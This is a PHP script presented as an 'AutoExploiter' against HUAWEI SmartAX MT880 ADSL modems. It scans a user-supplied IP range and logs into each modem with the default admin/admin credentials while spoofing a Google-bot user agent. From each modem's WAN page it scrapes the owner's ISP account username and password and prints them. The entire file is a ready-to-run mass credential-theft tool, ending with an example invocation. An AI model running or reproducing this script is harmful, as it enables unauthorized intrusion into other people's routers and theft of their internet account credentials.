<?
#!/usr/bin/php

error_reporting(0);
set_time_limit(0);

if ($argc<3) {
print "[==============================================]\n";  
print "[ AutoExploiter ADSL-modem beta 0.1            ]\n";
print "[ Grab account [ FreeInet ]                    ]\n";  
print "[ Modem target: HUAWEI SmartAX MT880           ]\n";
print "[ Author: PowerWMZ / Date: 10/08/2008          ]\n";  
print "[==============================================]\n";
print "USAGE:\n"; 
print " [start_ip] - Start target ip\n";
print " [end_ip]   - End target ip\n";
print "SIMPLE:\n";
print " ]$ php {$argv[0]} 192.168.0.1 192.168.12.254\n";

print "\n";
die;
}
$start = $argv[1];
$end   = $argv[2];
print "[+] Grab accounts... ";

  
  $i=ip2long($start);
    while($i<=ip2long($end))
{
$ip = long2ip($i);

$auth_sock = fsockopen($ip, 80, $error, $errstr, 3);
if($auth_sock==false){}
else {
$user = "admin";
$pass = "admin";

$breq  = "GET /WAN.html HTTP/1.0\r\n";   
$breq .= "Host: ".$ip."\r\n";   
$breq .= "User-Agent: Google-bot\r\n";  
$breq .= "Content-Type: text/html; charset=utf-8\r\n";   
$breq .= "Connection: Keep-Alive\r\n"; 
$breq .= "Authorization: Basic ".base64_encode($user.":".$pass)."\r\n\r\n"; 

unset($buff);
fputs($auth_sock, $breq);  
while (!feof($auth_sock))

{
$buff[] = fgets($auth_sock,1024);
}
if (array_key_exists(336, $buff)) {
$sum[0] = $buff[336];
$sum[1] = $buff[338];

              $x=0; while($x < 2){
                $s = strstr($sum[$x],'VALUE=');  

                $nm = strpos($s,'onBlur='); 

                $result = substr($s,7,$nm - 7);
                $check[] = preg_replace("|\"|", "", $result);
                $x++;
             }

                
                print "\n[-] Ip: ".$ip." | ";
                print "Username: ".$check[0]." | ";
                print "Password: ".$check[1];
     } 
}        
fclose($auth_sock);
$i++;
}
print "\n[!] Done!\n";
?>

php.exe script.php 192.168.0.1 192.168.12.254